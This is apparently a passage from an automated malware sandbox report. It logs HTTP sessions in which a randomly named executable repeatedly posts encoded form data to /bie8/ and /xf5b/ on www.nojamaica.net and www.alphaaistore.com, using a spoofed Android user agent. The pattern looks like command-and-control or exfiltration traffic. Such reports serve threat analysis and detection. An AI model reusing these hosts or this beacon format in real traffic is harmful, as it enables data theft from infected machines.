                                                                                                                                                                            Data Raw: 41 68 3d 42 43 58 55 41 77 35 56 47 54 65 68 39 76 4a 4c 7a 7a 4d 59 66 61 47 63 2b 45 54 39 69 55 51 64 65 45 6d 42 70 6f 4d 64 67 5a 39 72 59 75 64 6a 43 4a 53 37 36 33 75 56 42 34 4f 45 61 4a 32 2f 73 6b 52 74 59 73 45 53 56 58 4a 77 41 4c 6c 65 7a 46 49 4f 4e 71 6d 4f 74 6c 47 38 50 63 56 62 42 4e 35 6d 37 69 67 6b 4c 56 74 38 73 45 68 6d 2f 6f 4d 65 54 4c 34 32 47 62 35 33 45 49 65 38 70 68 33 4c 58 61 75 79 46 42 68 6b 34 76 36 4e 70 2b 30 46 72 31 6f 59 77 31 67 6e 77 2b 78 4c 2f 62 4a 49 6e 64 51 68 38 57 59 4f 72 38 78 76 4a 32 4e 43 6b 52 37 50 57 37 4f 77 2f 70 68 43 78 39 75 71 4d 56 67 3d
                                                                                                                                                                            Data Ascii: Ah=BCXUAw5VGTeh9vJLzzMYfaGc+ET9iUQdeEmBpoMdgZ9rYudjCJS763uVB4OEaJ2/skRtYsESVXJwALlezFIONqmOtlG8PcVbBN5m7igkLVt8sEhm/oMeTL42Gb53EIe8ph3LXauyFBhk4v6Np+0Fr1oYw1gnw+xL/bJIndQh8WYOr8xvJ2NCkR7PW7Ow/phCx9uqMVg=
                                                                                                                                                                            Sep 27, 2024 17:31:57.286891937 CEST377INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:57 GMT
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            30192.168.2.563725160.251.148.20805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:31:59.012377024 CEST861OUTPOST /bie8/ HTTP/1.1
                                                                                                                                                                            Host: www.nojamaica.net
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.nojamaica.net
                                                                                                                                                                            Referer: http://www.nojamaica.net/bie8/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 42 43 58 55 41 77 35 56 47 54 65 68 39 4c 31 4c 78 51 30 59 59 36 47 64 79 6b 54 39 37 6b 51 5a 65 45 71 42 70 70 34 4e 31 36 5a 72 62 50 74 6a 44 49 53 37 32 58 75 56 4f 59 50 41 43 70 33 78 73 6b 4d 51 59 74 34 53 56 58 4e 77 41 4a 39 65 7a 30 49 4a 4f 61 6d 49 6e 31 47 36 41 38 56 62 42 4e 35 6d 37 69 30 4b 4c 56 31 38 73 77 64 6d 74 5a 4d 5a 61 72 34 33 51 4c 35 33 41 49 66 37 70 68 33 6c 58 62 79 55 46 48 74 6b 34 71 65 4e 6f 76 30 45 38 6c 6f 53 36 56 67 32 36 65 30 68 34 36 31 70 6d 2b 56 69 73 32 49 54 6e 71 63 46 54 55 46 71 33 78 58 33 47 6f 47 48 75 5a 41 72 72 65 2b 61 53 43 30 55 55 52 47 4c 76 38 6b 45 62 67 6c 31 56 6d 32 53 32 64 65 41
                                                                                                                                                                            Data Ascii: Ah=BCXUAw5VGTeh9L1LxQ0YY6GdykT97kQZeEqBpp4N16ZrbPtjDIS72XuVOYPACp3xskMQYt4SVXNwAJ9ez0IJOamIn1G6A8VbBN5m7i0KLV18swdmtZMZar43QL53AIf7ph3lXbyUFHtk4qeNov0E8loS6Vg26e0h461pm+Vis2ITnqcFTUFq3xX3GoGHuZArre+aSC0UURGLv8kEbgl1Vm2S2deA
                                                                                                                                                                            Sep 27, 2024 17:31:59.822199106 CEST377INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:31:59 GMT
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            31192.168.2.563726160.251.148.20805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:32:01.550728083 CEST1878OUTPOST /bie8/ HTTP/1.1
                                                                                                                                                                            Host: www.nojamaica.net
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.nojamaica.net
                                                                                                                                                                            Referer: http://www.nojamaica.net/bie8/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 42 43 58 55 41 77 35 56 47 54 65 68 39 4c 31 4c 78 51 30 59 59 36 47 64 79 6b 54 39 37 6b 51 5a 65 45 71 42 70 70 34 4e 31 36 52 72 62 39 6c 6a 43 72 36 37 33 58 75 56 51 6f 50 4e 43 70 33 38 73 6b 46 58 59 74 30 64 56 56 46 77 53 63 68 65 34 6d 67 4a 56 71 6d 49 76 56 47 37 50 63 56 4f 42 4d 56 69 37 69 6b 4b 4c 56 31 38 73 78 4e 6d 36 59 4d 5a 59 72 34 32 47 62 35 72 45 49 66 66 70 69 47 59 58 59 65 45 46 33 4e 6b 35 4b 75 4e 71 64 63 45 2f 46 6f 55 35 56 68 72 36 66 49 36 34 36 70 62 6d 39 4a 63 73 30 6f 54 6a 62 78 6d 55 77 64 74 74 41 4c 73 42 4b 2b 78 34 73 6f 52 6b 76 4b 2b 59 31 41 4b 52 69 61 39 71 71 49 77 5a 53 38 2f 57 44 2b 43 37 64 6a 4a 70 6d 34 6b 61 57 66 47 71 53 4a 2f 36 67 68 6b 63 35 4f 79 31 33 6c 4e 72 69 54 55 50 6b 72 43 42 67 4d 2f 6f 6c 61 47 67 70 69 42 57 4d 58 37 6a 56 36 6c 71 36 68 41 57 42 75 4d 30 75 72 4c 2b 70 4f 39 4a 72 56 64 78 59 33 79 79 71 4a 78 59 49 67 62 47 6d 52 6f 53 52 4a 71 31 4c 35 37 43 49 76 32 61 58 43 61 53 67 48 55 38 48 76 44 54 73 34 [TRUNCATED]
                                                                                                                                                                            Data Ascii: Ah=BCXUAw5VGTeh9L1LxQ0YY6GdykT97kQZeEqBpp4N16Rrb9ljCr673XuVQoPNCp38skFXYt0dVVFwSche4mgJVqmIvVG7PcVOBMVi7ikKLV18sxNm6YMZYr42Gb5rEIffpiGYXYeEF3Nk5KuNqdcE/FoU5Vhr6fI646pbm9Jcs0oTjbxmUwdttALsBK+x4soRkvK+Y1AKRia9qqIwZS8/WD+C7djJpm4kaWfGqSJ/6ghkc5Oy13lNriTUPkrCBgM/olaGgpiBWMX7jV6lq6hAWBuM0urL+pO9JrVdxY3yyqJxYIgbGmRoSRJq1L57CIv2aXCaSgHU8HvDTs4Lqa7tyR8FmDB4uvugykIZX64HDiKMpf+OmlyaxFECNA/XD9480lEahpvSrfzIRx2wKlR4tJzqp+SWg1H/9EWilkvbNMuxreib6t++Io+Ld4fJJ81ovMl3yl6627xYnkQmWb/tDmj3wW+9A1eC29XHSXyWNu1/v37sW8eV9+hWu9RCQbloc5AYamwEQzEoGomG8GKw4NQLtJuQshn+sLYamI0opIe1L1F8pICNO3WowMnDvDR7JBQmsqlFE1Su88oIAUHl+Uk4z6etCRFcPvoKT9JAORCn8p2bXed22CVW1t4XrPs1J1ri60ROuL5JHSqRBjJ4wZ0x6Y2tId6JTrIOWVoRK8MT76cfYOL1uYjJaCAI31JTCgoseh6p+jJDi4qo+ZFRxl+6NP0mL3a7ZfDeSBfwrunXn9A6rLcAF4ZehoBA9bPD14K8j4LOjwS4qo3Ul3ob9jDOsVDwtsWFDnfXABqWsxWFUa6D2LXNQgpxJLWGxOfvy9pKPdpaan999wi9m3ahDRF4Wbv7kqMZzzEd/NGwaAL+qOP6qmrOrrMLY9b3k4dC74BpeL4HeeEVzs6VyB0GK1E/Er7wOoQNdca4oKur396O9Z6HgYRCTG6oDpCchMTeWr0HZKVhM6LXJ1BkFEdEDueNazGKd+Ty5Az1gPQ6BcLWj5xcK [TRUNCATED]
                                                                                                                                                                            Sep 27, 2024 17:32:02.544923067 CEST377INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:32:02 GMT
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            32192.168.2.563727160.251.148.20805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:32:04.095128059 CEST585OUTGET /bie8/?Ah=MA/0DFY0DiyH2olo7m8hVrrP5UH/jhcgcmWioqAK+793cplJM4qg3DyTQ66FMurZmF9Te+JpNl4zVYtM50IcS4zemXuWAdJhdKdflRI3BWRfqiAf3s5RU6wyOr9MBb+x+g==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.nojamaica.net
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:32:04.944849014 CEST359INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:32:04 GMT
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                            Content-Length: 196
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            33192.168.2.563728208.91.197.39805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:32:10.442198038 CEST850OUTPOST /xf5b/ HTTP/1.1
                                                                                                                                                                            Host: www.alphaaistore.com
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 203
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.alphaaistore.com
                                                                                                                                                                            Referer: http://www.alphaaistore.com/xf5b/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 57 57 30 63 48 71 70 76 57 45 65 78 63 44 32 64 48 74 5a 77 71 4c 35 43 6e 42 76 73 57 30 69 33 65 49 39 31 47 30 34 4f 51 41 6c 5a 4c 6c 73 72 65 76 55 4f 4d 6c 4e 41 53 30 4f 79 65 7a 46 61 71 53 62 56 4d 63 6e 59 4f 73 30 7a 4e 6f 41 47 74 6f 36 2f 6d 43 4d 70 35 42 68 2f 41 65 44 75 57 42 69 32 75 53 39 55 59 31 58 38 34 79 6b 73 74 53 65 41 42 46 68 52 2b 72 57 4f 49 79 48 6c 73 50 48 74 54 37 74 4b 59 78 61 73 30 47 66 48 33 6b 53 35 47 74 74 6b 6d 4d 45 2b 58 6b 66 75 31 37 79 4f 30 78 54 39 70 4f 59 63 44 30 4d 52 6e 62 76 76 53 4c 47 49 71 47 56 38 47 35 6c 78 2f 4b 46 2b 77 59 6f 3d
                                                                                                                                                                            Data Ascii: Ah=WW0cHqpvWEexcD2dHtZwqL5CnBvsW0i3eI91G04OQAlZLlsrevUOMlNAS0OyezFaqSbVMcnYOs0zNoAGto6/mCMp5Bh/AeDuWBi2uS9UY1X84ykstSeABFhR+rWOIyHlsPHtT7tKYxas0GfH3kS5GttkmME+Xkfu17yO0xT9pOYcD0MRnbvvSLGIqGV8G5lx/KF+wYo=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            34192.168.2.563729208.91.197.39805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:32:13.025866985 CEST870OUTPOST /xf5b/ HTTP/1.1
                                                                                                                                                                            Host: www.alphaaistore.com
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 223
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.alphaaistore.com
                                                                                                                                                                            Referer: http://www.alphaaistore.com/xf5b/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 57 57 30 63 48 71 70 76 57 45 65 78 66 67 2b 64 46 4f 78 77 73 72 35 4e 2b 78 76 73 59 55 69 7a 65 49 35 31 47 78 59 65 52 79 52 5a 4c 42 6b 72 66 74 73 4f 63 31 4e 41 47 6b 4f 4e 52 54 45 59 71 53 6d 71 4d 63 72 59 4f 6f 63 7a 4e 73 45 47 73 62 53 34 6e 53 4d 76 31 68 68 39 64 75 44 75 57 42 69 32 75 53 34 42 59 32 6e 38 34 42 38 73 72 78 47 44 65 31 68 57 75 37 57 4f 4d 79 48 35 73 50 47 36 54 35 59 68 59 7a 53 73 30 45 48 48 33 31 54 76 50 74 74 69 37 38 46 70 63 30 79 63 31 61 69 42 30 6a 69 37 38 49 73 30 47 43 68 37 39 35 6e 48 42 72 71 77 36 56 64 4c 58 4a 45 59 6c 70 56 4f 75 50 2f 41 67 31 4b 50 47 2f 64 79 30 63 49 66 37 2b 51 41 34 52 74 2f
                                                                                                                                                                            Data Ascii: Ah=WW0cHqpvWEexfg+dFOxwsr5N+xvsYUizeI51GxYeRyRZLBkrftsOc1NAGkONRTEYqSmqMcrYOoczNsEGsbS4nSMv1hh9duDuWBi2uS4BY2n84B8srxGDe1hWu7WOMyH5sPG6T5YhYzSs0EHH31TvPtti78Fpc0yc1aiB0ji78Is0GCh795nHBrqw6VdLXJEYlpVOuP/Ag1KPG/dy0cIf7+QA4Rt/


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            35192.168.2.563730208.91.197.39805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:32:15.571778059 CEST1887OUTPOST /xf5b/ HTTP/1.1
                                                                                                                                                                            Host: www.alphaaistore.com
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Content-Length: 1239
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Origin: http://www.alphaaistore.com
                                                                                                                                                                            Referer: http://www.alphaaistore.com/xf5b/
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Data Raw: 41 68 3d 57 57 30 63 48 71 70 76 57 45 65 78 66 67 2b 64 46 4f 78 77 73 72 35 4e 2b 78 76 73 59 55 69 7a 65 49 35 31 47 78 59 65 52 79 4a 5a 49 7a 38 72 65 4b 41 4f 4f 6c 4e 41 46 6b 4f 4d 52 54 45 5a 71 57 4b 6d 4d 64 57 6e 4f 75 59 7a 66 66 4d 47 6b 4b 53 34 75 53 4d 76 71 52 68 67 41 65 43 30 57 42 79 79 75 54 49 42 59 32 6e 38 34 41 4d 73 38 79 65 44 46 31 68 52 2b 72 58 50 49 79 48 64 73 50 2f 50 54 35 63 58 59 6a 79 73 30 6e 2f 48 37 6e 4c 76 54 39 74 67 36 38 46 68 63 30 2b 48 31 61 2b 37 30 6a 36 64 38 50 59 30 47 6d 51 43 34 4a 2f 45 51 36 69 71 71 43 56 47 4f 75 73 2b 72 34 46 50 69 4e 6e 56 6e 56 6d 78 42 71 56 4d 68 50 39 7a 70 34 6b 61 34 58 49 73 55 74 4a 54 45 77 38 34 56 7a 79 4e 48 6a 6c 6b 39 47 7a 4b 69 49 4a 33 6c 7a 41 4c 4d 54 64 74 4d 2b 6d 48 4e 57 30 67 78 43 47 2f 6c 69 65 76 49 43 74 65 4a 53 6a 69 48 35 4f 65 66 6b 74 6a 74 68 69 33 4f 57 51 62 42 53 61 56 34 69 63 4a 52 4b 52 35 45 47 38 6f 55 33 4c 6e 73 64 6a 6b 73 6f 6b 47 6b 41 2b 5a 45 69 2b 49 4b 37 31 5a 6f 78 32 [TRUNCATED]
                                                                                                                                                                            Data Ascii: Ah=WW0cHqpvWEexfg+dFOxwsr5N+xvsYUizeI51GxYeRyJZIz8reKAOOlNAFkOMRTEZqWKmMdWnOuYzffMGkKS4uSMvqRhgAeC0WByyuTIBY2n84AMs8yeDF1hR+rXPIyHdsP/PT5cXYjys0n/H7nLvT9tg68Fhc0+H1a+70j6d8PY0GmQC4J/EQ6iqqCVGOus+r4FPiNnVnVmxBqVMhP9zp4ka4XIsUtJTEw84VzyNHjlk9GzKiIJ3lzALMTdtM+mHNW0gxCG/lievICteJSjiH5Oefktjthi3OWQbBSaV4icJRKR5EG8oU3LnsdjksokGkA+ZEi+IK71Zox2vja/0XLK0dXNR8EguaWOZv0ZrHThyS3JVSS2QDZeCTmWizhI6bN5+QlpAabCTTDKJSPUhX354vo+iRBdcay2+NtZ37WlGQEYrNZwd/IGQrJt0Af+foXaqAqmzaIQWY2STheJb9SvJezNk5Iq8Yng+CWX/zrs6doGHSD/xTtGSPt1rEMFiYulmpxGdtDXHdEbT5SFm9MoUcFcbWPzXTUP71nFxhv8ZSDqm4CtFnrV+uyFOIhaDqItHCHpH3Sd59B63pjQnFD3H704luoJ+Eoxa6CKYFZltwhGvjKIRFy9293cxp+66fH62koY3PbDbSK1t/+rvcFA6OUOdPgNeS6FxPi0JbYLxOktMOS04cuFlGWl2r4KxiLUNIdkMOh7TyZs4uipHHb5OiWuAknahFlSygDdXliJeA8uyvhzDAv90rUdLpRgU5Tby+J0PwIVEMcpl3hdTHhwQA7OfVSNeXdlqcTkdTHq2RK77his72g2EPT6XnDEzM9Nc4KRoyphJJfgipKdW56Rb8EydemoejSPYmm+EgBG92OHVT5geDxEMIGghHjtxwUd3VlGq9GKdt97P+EZgJ+PGHPn856ZEx33etqIBL5Vw1HuFz7dimFKxLC8tmQAvXWYYtxF2g8FJZ7bCkL6sPjnPFP2qyQvyam3590cNwKYZ9ml5g [TRUNCATED]


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            36192.168.2.563731208.91.197.39805008C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Sep 27, 2024 17:32:18.115799904 CEST588OUTGET /xf5b/?Ah=bUc8Ed0aZESOAy+KJaIejJlAhDqRJymtCfRMAnUAQR11I0sOX+AQaEFDTlraWU4+rT7gLfO5Dt9FKcAEmJO6tRh3wQ1OL/3vPyqK0hsKckbG/SsYmEPJIzY3hoX+M0Wr3w==&6RGD=r8eHwnMpb2dxK HTTP/1.1
                                                                                                                                                                            Host: www.alphaaistore.com
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
                                                                                                                                                                            Sep 27, 2024 17:32:19.335733891 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Fri, 27 Sep 2024 15:32:18 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                            Set-Cookie: vsid=907vr4749967386924613; expires=Wed, 26-Sep-2029 15:32:18 GMT; Max-Age=157680000; path=/; domain=www.alphaaistore.com; HttpOnly
                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_h3dUMVMQ/Tk94Fq0yoPok5QyIT/DSRmovzrNNCz/K3l/Yb4FU1nosxLAM3e7WA5VPvoJMW6WmlNd/QkqeA3X/w==
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Connection: close
